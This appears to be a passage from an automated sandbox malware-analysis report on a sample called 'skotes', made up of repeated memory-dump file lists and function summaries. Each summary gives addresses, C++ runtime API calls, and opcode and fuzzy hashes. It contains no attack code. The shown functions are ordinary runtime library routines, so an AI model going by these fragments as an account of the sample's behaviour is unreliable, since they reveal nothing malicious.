Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: S9J$csm
API String ID: 1170836740-1039778544
Opcode ID: ce49c1d52c79a70b8c1c5acdbb7ff36892567072dd5da818072fee7fe882b470
Instruction ID: 3b0f524da6ba678459329984837d35d3ba0fcd4a3a8018729c074f93546eb6e9
Opcode Fuzzy Hash: ce49c1d52c79a70b8c1c5acdbb7ff36892567072dd5da818072fee7fe882b470
Instruction Fuzzy Hash: 4741E774A002089FCF10DF29D844A9F7BB4AFD6318F14815BF8149B352C7BD9A15CB95

Function 00497364 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004973B0
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004973F2
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0049740E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00497419
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00497440

Strings

count, xrefs: 0049737E
ppVirtualProcessorRoots, xrefs: 00497438

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3897347962-3650809737
Opcode ID: 577fab4f1185b90440235c9cd414ce4c70b9857904a656bcf2ace83fb47515eb
Instruction ID: 69b35a2d1e1f73c50a21fc17694a5dd0d20bc624d74593f386df714773fa5dbe
Opcode Fuzzy Hash: 577fab4f1185b90440235c9cd414ce4c70b9857904a656bcf2ace83fb47515eb
Instruction Fuzzy Hash: 0B216134A00219EFCF10EF95C595AAE7FB5BF19344F14407AE90197351CB38AD00CB58

Function 0048EE5F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0048EEBC
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0048EEC8
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0048EEE1
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0048EF0F
Concurrency::Context::Block.LIBCONCRT ref: 0048EF31

Strings

iH, xrefs: 0048EED0

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID: iH
API String ID: 1182035702-997331765
Opcode ID: 65ce68668f67484e4e8c84ffff43c325d1bb8410e27bb2fe3f1deecfb5634018
Instruction ID: 4b61a252a65dfc1436e9962cd325e4d3dc2848d15d5386563247f5301d4efa2f
Opcode Fuzzy Hash: 65ce68668f67484e4e8c84ffff43c325d1bb8410e27bb2fe3f1deecfb5634018
Instruction Fuzzy Hash: CF217170C002059ADF24FFA6C4456EEB7F0BF15324F100D2FE261A62D1E7794A45CB59

Function 004978E1 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00497903

Part of subcall function 00495CB8: __EH_prolog3_catch.LIBCMT ref: 00495CBF
Part of subcall function 00495CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00495CF8

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0049792A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00497936

Part of subcall function 00495CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00495D70
Part of subcall function 00495CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00495D7E

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00497982
Concurrency::location::_Assign.LIBCMT ref: 004979A3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 004979AB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 004979BD
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 004979ED

Part of subcall function 0049691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00496942
Part of subcall function 0049691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00496965

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
String ID:
API String ID: 1475861073-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: 45ac183bf00d05d564944c5346acc6c7e9c501f4c8e663610270006cfb9e6425
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 4D31E370B182556EEF16AA7844927FF7FA5DF41304F0401BBD485D7342DA2C4D4AC795

Function 004B4C14 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 004B4C98
__alloca_probe_16.LIBCMT ref: 004B4D5E
__freea.LIBCMT ref: 004B4DCA

Part of subcall function 004AB04B: RtlAllocateHeap.NTDLL(00000000,A02F68A0,?,?,0048D3FC,A02F68A0,?,00487A8B,?,?,?,?,?,?,00477465,?), ref: 004AB07E

__freea.LIBCMT ref: 004B4DD3
__freea.LIBCMT ref: 004B4DF6

Strings

ZJ,mJ, xrefs: 004B4C26

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID: ZJ,mJ
API String ID: 1423051803-3561173285
Opcode ID: 0187a8e14d6cdf16d383f55f2561d8f122b2509fda4c5a147f50ba85f48345cf
Instruction ID: 2daf2be3788aa2d5f20ce2d886d4ec6b72472bd90507766d873b0aae563217c3
Opcode Fuzzy Hash: 0187a8e14d6cdf16d383f55f2561d8f122b2509fda4c5a147f50ba85f48345cf
Instruction Fuzzy Hash: 6C51DF72600206AFEB219E658C41FFB3BADDBD1714F15062BFD04A7242EB38DC1196B8

Function 0049DD18 Relevance: 10.6, APIs: 7, Instructions: 117threadCOMMON

Download Yara Rule

APIs

Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 0049DD91
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 0049DDAE
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 0049DE14
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0049DE29
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 0049DE3B
Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 0049DE4B
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 0049DE74

Memory Dump Source

Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
